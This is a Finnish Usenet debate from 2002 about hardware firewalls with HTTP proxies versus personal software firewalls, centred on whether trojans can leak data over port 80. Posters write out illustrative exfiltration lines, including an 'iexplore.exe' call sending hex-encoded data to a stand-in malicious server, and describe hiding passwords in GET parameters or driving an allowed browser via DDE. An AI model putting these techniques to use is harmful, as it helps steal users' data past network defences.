jutella kuin http-protokollan mukaan ulkopuolelle, tietoja voi väilittää
silloin ainoastaan vaikkapa GET:n parametreina, mutta näitäkin proxy
voidaan laittaa rajoittamaan, tai vaikkapa kieltää kokonaan.
> Jos ja kun ZAP:ssa pääkäyttäjä määrittelee mitä ohjelmia saa ulos mennä
> niin siihen ei voi kukaan ujuttaa mitään haittaohjelmaa menemään ulos
> (paitsi pääkäyttäjä). Jos kaikille firman koneille on asennettu ZAP ja
> konfiguroitu niin että ainoastaan selain saa mennä ulos niin tavalliset
> käyttäjät EIVÄT PÄÄSE KIRVEELLÄKÄÄN ulos siitä koneesta muulla kuin
> sillä täsmälleen yhdellä selaimella jolla on lupa mennä ulos! Hyvä niin,
> KOSKA, se firman rautapalomuuri ei tiedä hevon vittua siitä MIKÄ
> OHJELMA on menossa ulos, se voi vain blokata portteja ja tiettyjä IP-
> osoitteita, ei siis estää troijalaisia lähettämästä tietojaan portin 80 kautta
> ulos hakkerin osoitteeseen (kun kerran sitä hakkerin osoitetta ei tiedetä ja
> se voi vaihtuakin jos troijalaisiin on se ohjelmoitu).
Jos opera on sallittuna ohjelmana, niin bat-joka käynnistää operan
komennolla:
opera "http://fenix.lnet.lut.fi/bus?s=t1&e=t4&date=1&line=56&sh=a&go=Hae"
lähettää nuo tiedot palvelimelle, yhtähyvin tuossa voitaisiin lähettää
GET:n sisälle naamioituna salasanoja (sinä kun ilmeisesti ne talletat
koneellesi johonkin).
Sauli Luoto
> Kuka on väittänyt että troijalainen rikkoisi http protokollaa? Kuten sanoin, se
> voi vaikka "täyttää lomakkeen" jollakin sivulla tms. ole luova. Mikä tahansa
> mikä mahtuu http protokollaan kelpaa tietojen lähettämiseen koneelta
> nettiin.
Ja kuten sanoin niin proxyn voi konfiguroida niin, ettei se päästä noita
tietoja eteenpäin, jolloin myös tuo aukko on tukittu.
> Selaimen ollessa kyseessä se voi lähettää vain silloin kun selain on
> päästetty nettiin, kunnon admin on tietysti laittanut asetukseksi että
> kysytään vielä käyttäjältä lupa (siis palomuuri kysyy) erikseen kun hän
> haluaa käyttää ko. ohjelmaa. Tällöin troijalainen voisi käyttää selainta
> ainoastaan silloin kun sen käyttäjäkin käyttää sitä. Tällöin taas käyttäjä kyllä
> huomaa jos selain alkaa vaikkapa hakea jotakin tiettyä sivua ja täytellä
> kaavakkeita tms. Tosin, en tiedä onko mahdollista edes, voimatta
> hakkeroida varsinaista selainohjelmaa, tehdä sellainen ohjelmanpätkä joka
> vasta selaimen käynnistyessä syöttää jotakin jollekin sivulle. Sellaisen voi
> tehdä joka syöttää hetkenäX, mutta silloin käyttäjä havahtuu että mitäs
> pirua, palomuurin mukaan Opera haluaa nettiin enkä mä ole sitä
> käyttämässä....
>
> Jos taas itse selaimen pääsisi uudelleenrakentamaan haluamakseen niin
> sitten voisi rakennella uudestaan mitä tahansa siinä koneessa. Kunnon
> asetuksilla käyttäjillä ei ole kuitenkaan oikeuksia kirjoittaa tiettyihin
> hakemistoihin jne.
Ei se selain ala mitään kaavakkeita täyttelemään, kaikki tiedot voidaan
lähettää yksinkertaisesti yhdellä komennolla ja ennekuin sivu on edes auki
tiedot on jo lähetetty ja vahinko tapahtunut. Annoin jo tuossa äskeisessä
postauksessa esimerkkinä komennon:
opera "http://fenix.lnet.lut.fi/bus?s=t1&e=t4&date=1&line=56&sh=a&go=Hae"
Joka lähettää nuo tiedot palvelimelle, ei olisi mikään ongelma varmaankaan
kirjoittaa javascript-pätkää tms, joka myös sulkisi tuon ikkunan
samantien, tai ohjata selain samantien operan/microsoftin kotisivuille.
95% käyttäjistä ei epäilisi mitään.
>> > Jos se proxy/firewall ei sijaitse samalla koneella, niin selitä minulle mistä
>> > se tietää että nettiin portista 80 on menossa troijalainen eikä vaikka
>> > webbiselain? Mistä se tietää mitä ohjelmia varsinaisella koneellasi SINÄ
>> > suoritat ja mitä troijalainen?
>>
>> Koska webbi-selain juttelee http-protokollaa, ja troijalainen luultavasti ei.
>
> Luultavasti ei. Entä jos juttelee. Homma pissii ja pahasti. Tietääkseni
> sellaisia on jotka juttelevat, ainakin porttia 80 käyttää moni ja useaan voi itse
> säätää mitä porttia niiden halutaan käyttävän.
Niin, mutta jos on säädettynä vain http proxy, niin on juteltava
täsmälleen http:tä päästäkseen ulos, ja silloinkin vain jos ei ole
kielletty moisia pitkiä GET -jonoja.
> - Mikään rautapalomuuri ei voi estää troijalaista tietokoneelta lähettämästä
> dataa ulos esimerkiksi portista 80 (tai muusta mikä on jätetty auki, 80 on
> varmaan kaikissa auki)...ja tarkennetaan nyt sitten...jos se vain leikkii http
> protokollaa.
Entäs jos proxy ei salli muita kuin "GET /tiedoston.nimi HTTP/1.0"
tyylisiä hakuja? Polkuun on toki varmasti mahdollista kätkeä myös jotain
faktaa, mutta epäilen että nekin on mahdollista karsia pois. Jos oikein
extreme haluaa olla.
Sauli Luoto
>> avaamaan uutta ikkunaa jne. jne.
>
> Lisätään vielä, että ZAP:n ollessa kyseessä se edellyttää siis ehdottomasti
> että selain käynnistetään. Rautapalomuuria varten ei tarvitse käynnistää
> internet selainta lainkaan työasemalta, riittää kun "jokin ohjelma" lähettää
> http tyyppistä kökköä portista 80 niin läpi menee jotta singahtaa...
Ero oli siinä, että ulkoisella proxy/firewall yhdistelmällä ne on
mahdollista karsia silti pois, jos niin tahdotaan. ZAP:illa niitä ei voi
karsia.
Tero Nieminen
> Tähän miksi ei voi estää kommentoin tuossa toisessa viestissä hiukan,
> ihmettyttää miksei käyttäjiä voi oikein Winkussa estää suorittamasta
> MITÄÄN muuta kuin ennalta määriteltyjä ohjelmia. Se nimittäin pelastaisi
> aika monelta ongelmalta.
NT:n kernelissä on kuuleman (Janne Pohjala) mukaan olemassa
ominaisuus, jolla voidaan estää sellaisen ohjelman ajaminen, jolla ei
ole tarvittavaa sertifikaattia (ts. sitä ei ole allekirjoitettu esim.
oman firman salaisella avaimella). Sitä en tiedä, kuinka pitkälle tuon
ominaisuuden käyttö on käytännössä mahdollista nyky-NT:llä tai kuinka
paljon siinnä mahdollisesti on reikiä tms. Ilmeisen vähäisessä
käytössä tuo kuitenkin lienee.
--
Tero Nieminen Olen sitä mieltä mitä olen,
t...@cc.jyu.fi mitä se mulle kuuluu.
Markus Jansson
wrote:
> Rautaa tarvitaan rajalla jotta paikallisiin verkkoresursseihin ei pääse
> kiinni muualta. Näitä kun ei voi rajoittaa MS:n tuotteissa kovinkaan
> luontevasti muuten.
Tyhmä kysymys mutta NTFS???
> Softapalomuurin kanssa leikkiminen tulee liian kalliiksi ja on virhealtis
> ratkaisu verrattuna rautaan.
Kalliiksi ehkä. Toisaalta jos ostaa lisenssit officeXP:lle, Photosopille ja muulle
kivalle tuhanteen koneeseen niin välttämättä se ZAP tai vastaavat eivät
paljon siinä laskussa tunnu...
> Usko jo että ei kukaan ala asentamaan softapalomuureja firman kaikkiin
> koneisiin ellei ole todella hyvä myyntimies myymässä.
Se olisi erittäin helppoa esim. oppilaitoksissa joissa yleensä tehdään yhteen
koneeseen kunnon asennus ja sitten kloonataan levy muihin koneisiin. Siinä
olisi ja pysyisi. Toisaalta jos koneita on vain muutama niin ei asennus ole
kummoinenkaan homma..
Markus Jansson
> > Lisätään vielä, että ZAP:n ollessa kyseessä se edellyttää siis
> > ehdottomasti että selain käynnistetään. Rautapalomuuria varten ei
> > tarvitse käynnistää internet selainta lainkaan työasemalta, riittää kun
> > "jokin ohjelma" lähettää http tyyppistä kökköä portista 80 niin läpi menee
> > jotta singahtaa...
>
> Ero oli siinä, että ulkoisella proxy/firewall yhdistelmällä ne on
> mahdollista karsia silti pois, jos niin tahdotaan. ZAP:illa niitä ei voi
> karsia.
Etkö osaa lukea vai onko ymmärryksessäsi jotakin vikaa?
Montako kertaa minun pitää sanoa: ET VOI KARSIA NIITÄ POIS MILLÄÄN
RAUTAPALOMUURILLA KOSKA RAUTAPALOMUURI EI VOI MUUTA
KUIN TARKKAILLA MIHIN OSOITTEESEEN JA PORTTIIN PAKETTIX
MENEE!
Ei voi olla noin vaikeata ymmärtää kun samaa asiaa olen koko ajan sanonut.
Ja koko ajan sinä hoet että rautapalomuuri voi tehdä saman...EI VOI.
Ymmärrätkö? EI VOI. Montako kertaa pitää sanoa? EI VOI. EI VOI tietää
MIKÄ ohjelma on menossa ulos tietkoneista. Rautapalomuuri ei voi sitä
tietää MITENKÄÄN.
Joko riitti vai vieläkö pitää toistaa??!?!?!?!?!?!
Markus Jansson
> > ZoneAlarm tekee tarkistussumman sekä ohjelmasta itsestään että
> > uusin Pro versio myös ko. ohjelmien käyttämistä .dll tiedostoista.
>
> Joka ei vaikuta mitenkään siihen mitä tietoa lähetetään tai mistä se
> luetaan.
Ei niin enkä siihen viitannutkaan vaan siihen että MUUT ohjelmat eivät voi
lähettää tietoa nettiin kuin ne jolle on erityisesti annettu lupa mennä nettiin.
> Jos ei nyt ole mennyt jakeluun, että olen juuri koittanut selittää, että
> sillä ei ole mitään väliä mikä ohjelma se on, kun se ohjelma ei voi
> jutella kuin http-protokollan mukaan ulkopuolelle, tietoja voi väilittää
> silloin ainoastaan vaikkapa GET:n parametreina, mutta näitäkin proxy
> voidaan laittaa rajoittamaan, tai vaikkapa kieltää kokonaan.
http protokollan kautta voi jutella miljoonalla tavalla. Et voi niitä kaikkia
kieltää. Tai voit toki jolloin kukaan ei pääse nettiin koko firmasta/koulusta.
Tai sitten troijalainen käyttää SSH porttia jne. jne.
Sinä lähde kilpajuoksuun jota et voi voittaa. Myönnä nyt että on mahdotonta
estää haittaohjelmaa rautapalomuurilla ottamasta yhteyttä ulkomaailmaan
jos edes JOKIN portti ulkomaailmaan on jätetty auki.
> Jos opera on sallittuna ohjelmana, niin bat-joka käynnistää operan
> komennolla:
> opera "http://fenix.lnet.lut.fi/bus?s=t1&e=t4&date=1&line=56
&sh=a&go=Hae"
> lähettää nuo tiedot palvelimelle, yhtähyvin tuossa voitaisiin lähettää
> GET:n sisälle naamioituna salasanoja (sinä kun ilmeisesti ne talletat
> koneellesi johonkin).
Lue nyt hyvä mies mitä kirjoitan.
1) Jos ZA on laitettu kysymään lupa (kuten pitäisi olla!) niin tuollaisen batin
suorittaminen aikaansaa kysymyksen vaikkapa kesken tekstinkäsittelyn että
haluatkos päästää Operan ulos? Epäilykset heräävät heti koska en ole itse
käynnistämässä Operaa.
2) JOS se saadaan jotenkin linkitettyä siihen että kun käyttäjä on itse
Operalla liikenteessä niin sitten se salakavalasti aukaisee piiloikkunan
(mitenkähän se senkin tekisi?) ja lähettää tietoja, sitä ei voidakaan
estää...mutta miten lähetät käyttäjän huomaamatta esim. Operan kautta
tietoja nettiin? Tiedostojen lähettäminen suoraan ei onnistu koska Opera
kysyy varmistuksen että haluaako käyttäjä siirtää tiedoston X palvelimelle.
3) Pointtina on että troijalainen tietokoneessa nappaa salasanoja talteen ja
tallettaa niitä johonkin ja sitten lähettää ne matkaan rautapalomuurin
läpi...toki voidaan troijalainen ohjelmoida lähettämään mitä tahansa
tiedostoja tai keräämään mitä tahansa tietoja ja lähettämään ne.
Summa summarum: on naurettavaa väittää rautapalomuuria jotenkin
"oikeaksi" ja "parhaaksi" ja "luotettavaksi" palomuuriksi. Siitä pääsee vielä
helpommin läpi ulospäin kuin henkilökohtaisesta palomuurista. Milloin vain
huvittaa kunhan menee oikeasta portista ja leikkii jotakin kivaa protokollaa.
Henkilökohtaisesta palomuurista pääsee läpi vain esim. nettiselaimen
kautta lähettämällä tietoa mutta sen pitäisi onnistua tapahtumaan käyttäjän
huomaamatta samalla kun käyttäjä itse surffaa netissä, muuten käry käy
armotta.
Ari Laitinen
> On Fri, 14 Jun 2002 19:00:49 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Rautaa tarvitaan rajalla jotta paikallisiin verkkoresursseihin ei pääse
> > kiinni muualta. Näitä kun ei voi rajoittaa MS:n tuotteissa kovinkaan
> > luontevasti muuten.
>
> Tyhmä kysymys mutta NTFS???
Mitä siitä? Pitäisikö minun sanoa tähän vaikka FAT32 tai Reiser FS?
> > Softapalomuurin kanssa leikkiminen tulee liian kalliiksi ja on
virhealtis
> > ratkaisu verrattuna rautaan.
>
> Kalliiksi ehkä. Toisaalta jos ostaa lisenssit officeXP:lle, Photosopille
ja muulle
> kivalle tuhanteen koneeseen niin välttämättä se ZAP tai vastaavat eivät
> paljon siinä laskussa tunnu...
Silti systeemi on pommi rautaan verrattuna vaikka olisi kalliimpi.
> > Usko jo että ei kukaan ala asentamaan softapalomuureja firman kaikkiin
> > koneisiin ellei ole todella hyvä myyntimies myymässä.
>
> Se olisi erittäin helppoa esim. oppilaitoksissa joissa yleensä tehdään
yhteen
> koneeseen kunnon asennus ja sitten kloonataan levy muihin koneisiin. Siinä
> olisi ja pysyisi. Toisaalta jos koneita on vain muutama niin ei asennus
ole
> kummoinenkaan homma..
Jos koneet ovat klooneja niin ei ne mitään palomuureja tarvitse. Niihin
voidaan kloonata riittävät käyttörajoittimet muutenkin ja kaikki pahat
ohjelmat hävitetään kloonaamalla systeemi joka yö serveriltä uudelleen.
Markus Jansson
> In article <1108_10...@news.utu.fi>, Markus Jansson wrote:
> Ja kuten sanoin niin proxyn voi konfiguroida niin, ettei se päästä noita
> tietoja eteenpäin, jolloin myös tuo aukko on tukittu.
No mitä tietoja se sitten päästää läpi? Kerro nyt. Jätä yksikin portti ja
protokolla auki niin siihen saa ympättyä tavalla tai toisella tietoa jonka
troijalainen voi lähettää läpi. Tätä et voi kiistää mitenkään.
Koetat tukkia aukkoja siivilässä.
Ari Laitinen
> Summa summarum: on naurettavaa väittää rautapalomuuria jotenkin
> "oikeaksi" ja "parhaaksi" ja "luotettavaksi" palomuuriksi. Siitä pääsee
vielä
> helpommin läpi ulospäin kuin henkilökohtaisesta palomuurista. Milloin vain
> huvittaa kunhan menee oikeasta portista ja leikkii jotakin kivaa
protokollaa.
> Henkilökohtaisesta palomuurista pääsee läpi vain esim. nettiselaimen
> kautta lähettämällä tietoa mutta sen pitäisi onnistua tapahtumaan
käyttäjän
> huomaamatta samalla kun käyttäjä itse surffaa netissä, muuten käry käy
> armotta.
Tärkeintähän on kuitenkin estää pahoja viruksia tulemasta pahasta
internetistä omalle tietokoneeseen.
Rautapalomuuri tekee tämän työn kunnialla ja estää pahat yhteydenotot.
Softapalomuuri sen sijaan päästää kaikki pahan ja tuhmat internet ilkiöt
koneelle asti ennenkuin viime tingassa yrittää ehtiä pelastamaan sen mitä
pelastettavissa on.
Jos nyt vaikka samaan aikaan kun paha troijalainen ohjelma yrittää taas
kerran tunkeutua tietokoneelle sattuukin vaikka CD aseman lataus olemaan
käynnissä niin voi käydä että softapalomuuri ei ehdikään torjua vihollista
ja niin pahan troijan hevonen sitten tunkeutuu tietokoneeseen koska
tietokoneella oli muuta tekemistä juuri kriittisellä hetkellä. Näin ei
tapahdu rautapalomuurilla koska se ei käytä CD asemia kriittisellä hetkellä.
Argumenttini ovat tässä yllä samaa tasoa kuin sinun ;-) joskin sinun
argumentit ovat teoriassa virheettömämpiä mutta käytännön niiden arvo on
samalla tasolla :-)
Matti Juhani Kurkela
> On 14 Jun 2002 12:36:50 +0300, Matti Juhani Kurkela
> > Parempi tapa on asentaa ensin koneet siten, että niiden asetukset ja
> > asennetut ohjelmat ovat tiedetysti turvalliset (parhaan
> > asennushetkellä saatavissa olevan tiedon mukaan). Sitten varmistetaan
> > että haittaohjelmia ei tule mistään sisään: tämä tarkoittaa sitä että
> > peruskäyttäjällä ei ole oikeutta asentaa ohjelmia eikä mahdollisuutta
> > ohittaa virustarkistusta. Äärimmillään peruskäyttäjien koneista
> > otetaan korppuasemat ja CD-asemat irti ja kotelot lukitaan, mutta
> > yleensä näin pitkälle ei tarvitse mennä kunhan käyttäjät pannaan
> > allekirjoittamaan sopivansisältöinen tietoturvasitoumus.
>
> Aivan, aivan! Mutta jos tietokoneiden asetukset jne. ovat kunnossa, ei
> periaatteessa tarvita rautapalomuuriakaan. Jos koneet kommunikoivat
> firman verkossa luotettavalla tavalla salaten viestinnän eikä niissä ole
> heikkoja salasanoja tai epäluotettavia palveluita niin ei kukaan
> niihin pääse toiselta puolen maailmaa sisään.
Rautapalomuurin pitäisikin ihanteellisessa maailmassa olla lähinnä
varmistava tekijä. Paras tilanne mihin voidaan päästä on nimittäin
tyyliin "koneissa ei _tiedetä olevan_ epäluotettavia palveluita".
Siispä palomuuri varmistaa että ulkopuolelta ei tulla käpälöimään
mitään muuta kuin sellaisia palveluita jotka on varta vasten
asetettu julkisiksi - ja myös että sisäpuolella virheellinen
konfigurointi, viallinen päivitys tai muu vastaava yksittäinen virhe
ei johda sellaiseen liikenteeseen ulospäin mitä ei haluta tapahtuvan.
> Haittaohjelma voidaan laittaa lähettämään tiedot vaikka käyttämällä
> "lomakkeen täyttöä" jollakin webbisivulla jolloin kaikki näyttää olevan ok.
Jep. Toisaalta tilanne jossa yritetään täyttää isossa pahassa
internetissä sijaitsevaan lomakkeeseen yli vaikkapa yhden kilotavun
verran tekstiä voidaan napata kiinni proxyssä. Samaten jos lomakkeelle
kirjoitetaan 1023 tavua, saadaan takaisin minimimittainen OK-vastaus
ja heti yritetään täyttää uutta 1023 tavun lomaketta. Tällaisen
tunnistaminen on "uutta" eikä valmiita sovelluksia välttämättä
ole... mutta teknisesti tuo onnistuisi.
> Totta, totta. Mutta jos oletetaan että adminiksi ei pääse vaan ainoastaan
> tavalliseksi käyttäjäksi. Tavallinen käyttäjä voi laukaista
> troijalaisen joka menee portista 80 ulos hakkerin palvelimeen jos
> henkilökohtaista palomuuria ei ole koneessa. Jos on, se ei onnistu.
Eikö? Mikä estää haittaohjelmaa ajamasta vaikkapa komentoa
"iexplore.exe http://pieni.ilkeä.palvelin/(vuodettava_data_heksamössönä)"?
Jos tämä ei onnistu ja selain on jo käynnissä, haittaohjelma voi lähettää
jo nettiluvan saaneelle selaimelle Windowsin DDE:llä samantyylisen
openURL()-käskyn. Estääkö softapalomuurisi nämä? Onko sillä
yleensäkään mitään varmaa keinoa varmistaa että Internet-yhteyttä
luvallisesti käyttävän ohjelman ohjaimissa on juuri käyttäjä eikä
toinen ohjelma?
Tässä kohtaa on juuri nyt menossa "asevarustelukilpa": ilkeät ihmiset
miettivät koko ajan uusia keinoja joilla haittaohjelmat voisivat
kiertää henkilökohtaisten palomuurien asettamat rajoitukset, ja
palomuurien valmistajat yrittävät pysyä vastakeinoineen perässä.
Uuden palomuuriohjelman ilmestyessä sen uusista ominaisuuksista on
tiedotettava, jolloin kaikki haittaohjelmien tekijät voivat saada
tiedon uudesta versiosta ja tutkia mitä parannuksia siihen on
tehty. Uusi haittaohjelma sen sijaan pysyy salassa kunnes se saadaan
kiinni ja analysoidaan - ja yksi haittaohjelman toiminnan
pääperiaatteista on juuri olla paljastumatta!
Eräässä mielessä henkilökohtainen palomuuri on tappion tunnustus:
"En pysty varmistamaan että koneessa ei päästä käynnistämään
haittaohjelmia, siispä asetan yhden ohjelman vahtimaan toisia ja
toivon etteivät haittaohjelmat ole vahtiohjelmaa ovelampia."
Tämä malli romahtaa jos satut saamaan koneeseesi haittaohjelman joka
on uudempi ja ovelampi kuin palomuuriohjelmasi.
> Eli paikallisesti järjestelmänvalvojan oikeuksia ei tarvita ohittamaan
> rautapalomuuri. Mutta softapalomuurin ohittamiseen ne tarvitaan.
Mutta jos rautapalomuurista on liikenne johonkin estetty kokonaan, sitä ei
ohiteta millään järjestelmänvalvojan oikeuksilla. Softapalomuurissa
tällainen ohitus voidaan tehdä - ja järjestelmänvalvojan oikeudet ovat
yksi haittaohjelman tavoitteista jo muistakin syistä. Suosin siis
ratkaisua jossa kaikki ei ole yhden kortin - järjestelmänvalvojan
salasanan - varassa.
> Rautapalomuurista on periaatteessa *ainoastaan* se hyöty että koneita ei
> voi ohjailla tai niihin ottaa vapaasti yhteyttä ulkopuolelta jos sisäänpäin
> tulevat portit on blokattu ja kone verkon sisällä vaarantunut. Ulospäin
> menevää liikennettähän se ei kykene rajoittamaan esim. portista 80 jos ei
> webbisurffailua kielletä kokonaan.
Lisäksi se että rautapalomuurilla lisätään yksi suojakerros: sen
sisäpuolella voidaan käyttää sellaisia ohjelmia ja palveluita joita ei
ole välttämättä todettu riittävän luotettaviksi Internet-käyttöön
mutta ovat kelvollisia käytettäväksi luotetussa, ystävällismielisessä
sisäverkossa. Esimerkiksi sisäverkon WWW-palvelin voidaan konfiguroida
siten että se ei anna firman sisäiseen käyttöön tarkoitettuja sivuja
ulkopuolisille selaimille - mutta varmemmaksi vakuudeksi yhteydenotot
internetistä sisäverkon WWW-palvelimeen estetään *myös*
(rauta)palomuurissa. Nyt pieni lipsahdus usein päivitettävässä ja
muokattavassa sisäverkon WWW-palvelimessa ei voi päästää internetistä
saapuvia kolkuttelijoita palvelimelle, koska muutos pitäisi tehdä
kahdessa täysin erillisessä paikassa, joista toista (palomuuria) ei
normaalitapauksessa edes tarvitse muutella jatkuvasti.
"Kuinka estetään haittaohjelmaa ottamasta yhteyttä ulos?" on ihan
oikeasti vaikea ongelma. Mietipä tätä:
1. Käyttäjän pitää saada käynnistää toisia ohjelmia ja antaa niille
komentoja.
2. Ohjelmien pitää saada käynnistää toisia ohjelmia ja antaa niille
komentoja.
3. Vain tietyt ohjelmat saavat ottaa yhteyttä internetissä
sijaitseviin palveluihin ja nekin vain ollessaan käyttäjän
ohjauksessa.
4. Kohtia 1 ja 2 ei pystytä kaikissa tilanteissa luotettavasti
erottamaan toisistaan. Käyttäjät haluavat toisinaan automatisoida
tiettyjä toistuvia toimintosarjoja - sehän on yksi tietokoneen
kehityksen perusideoista! Toisaalta esim. etähallintaohjelmien
on pystyttävä matkimaan näppäimistön ja hiiren käyttöä niin aidosti
kuin mahdollista.
Nykyisin tuntuu olevan suuri kiusaus integroida WWW-selainmoottori
graafiseen käyttöliittymään siten, että mikä tahansa ohjelma pystyy
käyttämään selainmoottoria vähällä vaivalla. Tämä voi lisätä
käyttömukavuutta ja helpottaa uusien sovellusten rakentamista, mutta
tietoturvamielessä tästä kehkeytyy äkkiä katastrofi: selain on
aivan liian monipuolinen ja laaja kokonaisuus annettavaksi jokaisen
koneessa pyörivän ohjelman käyttöön ilman tarkempaa kontrollia.
Sauli Luoto
> On 14 Jun 2002 15:28:03 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
>> > ZoneAlarm tekee tarkistussumman sekä ohjelmasta itsestään että
>> > uusin Pro versio myös ko. ohjelmien käyttämistä .dll tiedostoista.
>> Joka ei vaikuta mitenkään siihen mitä tietoa lähetetään tai mistä se
>> luetaan.
> Ei niin enkä siihen viitannutkaan vaan siihen että MUUT ohjelmat eivät voi
> lähettää tietoa nettiin kuin ne jolle on erityisesti annettu lupa mennä nettiin.
Lopputuloksen kannalta sillä ei ole mitään merkitystä mikä ohjelma ne
tiedot sinne nettiin on lähettänyt.
> http protokollan kautta voi jutella miljoonalla tavalla. Et voi niitä kaikkia
> kieltää. Tai voit toki jolloin kukaan ei pääse nettiin koko firmasta/koulusta.
Hyvä ettet anna tosiasioiden vaikuttaa, mutta jos sinua oikeasti
kiinnostaa, niin
http://www.ietf.org/rfc/rfc2616.txt
Lue faktaa ja arvaa uudelleen kuinka monella tavalla ulospäin voi jutella
http-protokollalla. Vihje, se on yksinkertainen protokolla.
Kerrotko muuten vielä missä kohtaa sanoin, että estäisin jonkun niistä
tavoista, sanoin että tarvittaessa voidaan kieltää esimerkkini mukaiset
GET:it, jolla lähetetään mahdollisesti tietoa palvelimelle.
> Tai sitten troijalainen käyttää SSH porttia jne. jne.
Sanoinhan, että suoraan internettiin pääsee vain http-proxyn läpi, joten
ssh portiin voi lähettää aivan mitä tahtoo, kun sitä ei reititetä
internettiin.
Jos/kun ssh-portille kuitenkin on tarvetta niin yhteydet firmasta
hoidetaan tietenkin turvallisen *BSD/Unix/Linux hyppylaudan kautta, jolle
otetaan ensin ssh omalta koneelta ja siitä edelleen saa ssh:n eteenpäin.
> Sinä lähde kilpajuoksuun jota et voi voittaa. Myönnä nyt että on mahdotonta
> estää haittaohjelmaa rautapalomuurilla ottamasta yhteyttä ulkomaailmaan
> jos edes JOKIN portti ulkomaailmaan on jätetty auki.
Koska liikenne kulkee http-proxyn kautta, niin ulkomaailmaan ei ole
suoraan mikään auki. Sinulle ei ole todella tainnut valjeta mikä on proxy?
>> Jos opera on sallittuna ohjelmana, niin bat-joka käynnistää operan
>> komennolla:
>> opera "http://fenix.lnet.lut.fi/bus?s=t1&e=t4&date=1&line=56
> &sh=a&go=Hae"
>> lähettää nuo tiedot palvelimelle, yhtähyvin tuossa voitaisiin lähettää
>> GET:n sisälle naamioituna salasanoja (sinä kun ilmeisesti ne talletat
>> koneellesi johonkin).
>
> Lue nyt hyvä mies mitä kirjoitan.
> 1) Jos ZA on laitettu kysymään lupa (kuten pitäisi olla!) niin tuollaisen batin
> suorittaminen aikaansaa kysymyksen vaikkapa kesken tekstinkäsittelyn että
> haluatkos päästää Operan ulos? Epäilykset heräävät heti koska en ole itse
> käynnistämässä Operaa.
Mikä estää tekemästä sellaista ohjelmaa, joka lähettää tuon vain kun opera
on käynnissä, jolloin sitä ei huomaa?
> 2) JOS se saadaan jotenkin linkitettyä siihen että kun käyttäjä on itse
> Operalla liikenteessä niin sitten se salakavalasti aukaisee piiloikkunan
> (mitenkähän se senkin tekisi?) ja lähettää tietoja, sitä ei voidakaan
> estää...mutta miten lähetät käyttäjän huomaamatta esim. Operan kautta
> tietoja nettiin? Tiedostojen lähettäminen suoraan ei onnistu koska Opera
> kysyy varmistuksen että haluaako käyttäjä siirtää tiedoston X palvelimelle.
Tietoa voi lähettää muutenkin kuin tiedostoina, kuten koitin tuolla
esimerkillä osoittaa, mutta ilmeisesti et ymmärrä myöskään miten GET:llä
välitetään tietoa http-protokollassa.
"http://fenix.lnet.lut.fi/bus?<tiedoston sisalto alkaa tasta..."
> 3) Pointtina on että troijalainen tietokoneessa nappaa salasanoja talteen ja
> tallettaa niitä johonkin ja sitten lähettää ne matkaan rautapalomuurin
> läpi...toki voidaan troijalainen ohjelmoida lähettämään mitä tahansa
> tiedostoja tai keräämään mitä tahansa tietoja ja lähettämään ne.
Niin, tuossa kysymysmerkin jälkeen voisi lukea vaikka sinun salasanasi,
niin se lähetetään ZAP:n läpi.
Miten ne salasanat lähetetään tiukasti konffatun rautapalomuurin läpi, kun
liikenne ohjataan http-proxyn läpi, joka tiputtaa edellä kuvatut pyynnöt?
> Summa summarum: on naurettavaa väittää rautapalomuuria jotenkin
> "oikeaksi" ja "parhaaksi" ja "luotettavaksi" palomuuriksi. Siitä pääsee vielä
> helpommin läpi ulospäin kuin henkilökohtaisesta palomuurista. Milloin vain
> huvittaa kunhan menee oikeasta portista ja leikkii jotakin kivaa protokollaa.
> Henkilökohtaisesta palomuurista pääsee läpi vain esim. nettiselaimen
> kautta lähettämällä tietoa mutta sen pitäisi onnistua tapahtumaan käyttäjän
> huomaamatta samalla kun käyttäjä itse surffaa netissä, muuten käry käy
> armotta.
Ennenkuin teet yhteenvetoja kerro toki miten se tapahtuu.
Sauli Luoto
>> mahdollista karsia silti pois, jos niin tahdotaan. ZAP:illa niitä ei voi
>> karsia.
> Etkö osaa lukea vai onko ymmärryksessäsi jotakin vikaa?
> Montako kertaa minun pitää sanoa: ET VOI KARSIA NIITÄ POIS MILLÄÄN
> RAUTAPALOMUURILLA KOSKA RAUTAPALOMUURI EI VOI MUUTA
> KUIN TARKKAILLA MIHIN OSOITTEESEEN JA PORTTIIN PAKETTIX
> MENEE!
Kuten olen jo, toistuvasti, kertonut http-proxy suodattaa ne pois
ennenkuin ne menevät varsinaiseen pakettisuodattimeen. Onko näistä
edellisistä sanoista sinulle outo http, proxy vaiko pakettisuodatin. Vai
peräti jokainen? Jotainhän tässä on oltava takana, kun et ymmärrä mitä
sinulle sanotaan.
> Ei voi olla noin vaikeata ymmärtää kun samaa asiaa olen koko ajan sanonut.
>
> Ja koko ajan sinä hoet että rautapalomuuri voi tehdä saman...EI VOI.
> Ymmärrätkö? EI VOI. Montako kertaa pitää sanoa? EI VOI. EI VOI tietää
> MIKÄ ohjelma on menossa ulos tietkoneista. Rautapalomuuri ei voi sitä
> tietää MITENKÄÄN.
>
> Joko riitti vai vieläkö pitää toistaa??!?!?!?!?!?!
Minä en sanonut että rautapalomuurilla voi tehdä saman, sanoin että sillä
voi tehdä enemmän. Lue uudelleen tämän viestin lainauksesta kolme
ensimmäistä riviä.
Olen kertonut sinulle tämänkin jo pariin kertaan, mutta otetaanpa vielä
kertauksen vuoksi yksi kierros. Palomuuri ei tee sillä ohjelman nimellä
mitään, koska se suodattaa liikennettä sisällön, kohteen ja yhteystyypin
mukaan.
Isolla kirjoittaminen tulkitaan muuten yleisesti nyysseissä huutamiseksi
ja lapsellisuuden merkiksi.
Sauli Luoto
> On 14 Jun 2002 15:52:59 GMT, slu...@maa1.cc.lut.fi (Sauli Luoto) wrote:
>> In article <1108_10...@news.utu.fi>, Markus Jansson wrote:
>> Ja kuten sanoin niin proxyn voi konfiguroida niin, ettei se päästä noita
>> tietoja eteenpäin, jolloin myös tuo aukko on tukittu.
> No mitä tietoja se sitten päästää läpi? Kerro nyt. Jätä yksikin portti ja
> protokolla auki niin siihen saa ympättyä tavalla tai toisella tietoa jonka
> troijalainen voi lähettää läpi. Tätä et voi kiistää mitenkään.
>
> Koetat tukkia aukkoja siivilässä.
http-proxy päästää http-protokollan mukaista liikennettä läpi, jota
kuitenkin voidaan tarkentaa periaatteessa täysin mielivaltaisesti.
esim tuo mainitsemani GET on muotoa
"GET /tiedosto.html?parametri1=arvo1¶metri2=arvo2...jne HTTP/1.0",
